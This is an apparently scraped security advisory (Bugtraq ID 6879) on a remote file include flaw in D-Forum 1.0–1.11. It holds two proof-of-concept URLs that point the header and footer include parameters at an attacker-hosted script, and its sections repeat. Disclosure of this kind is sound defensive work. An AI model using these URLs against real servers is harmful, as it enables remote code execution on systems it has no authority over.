D-Forum Remote File Include Vulnerability
BID:6879
Info
D-Forum Remote File Include Vulnerability
| Bugtraq ID: | 6879 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 18 2003 12:00AM |
| Updated: | Feb 18 2003 12:00AM |
| Credit: | Discovery is credited to "Frog Man" <[email protected]>. |
| Vulnerable: |
Adalis Informatique D-Forum 1.11 Adalis Informatique D-Forum 1.10 Adalis Informatique D-Forum 1.0 |
| Not Vulnerable: | |
Discussion
D-Forum Remote File Include Vulnerability
D-Forum is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in the /includes/header.php3 and /includes/footer.php3 scripts.
Under some circumstances, it is possible for remote attackers to influence the include path for the header and footer files to point to an external file on a remote server by manipulating some URI parameters.
D-Forum is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in the /includes/header.php3 and /includes/footer.php3 scripts.
Under some circumstances, it is possible for remote attackers to influence the include path for the header and footer files to point to an external file on a remote server by manipulating some URI parameters.
Exploit / POC
D-Forum Remote File Include Vulnerability
The following proof of concept was provided:
http://[target]/includes/footer.php3?my_footer=http://[attacker]/script.txt
http://[target]/includes/header.php3?my_header=http://[attacker]/script.txt
The following proof of concept was provided:
http://[target]/includes/footer.php3?my_footer=http://[attacker]/script.txt
http://[target]/includes/header.php3?my_header=http://[attacker]/script.txt
Solution / Fix
D-Forum Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.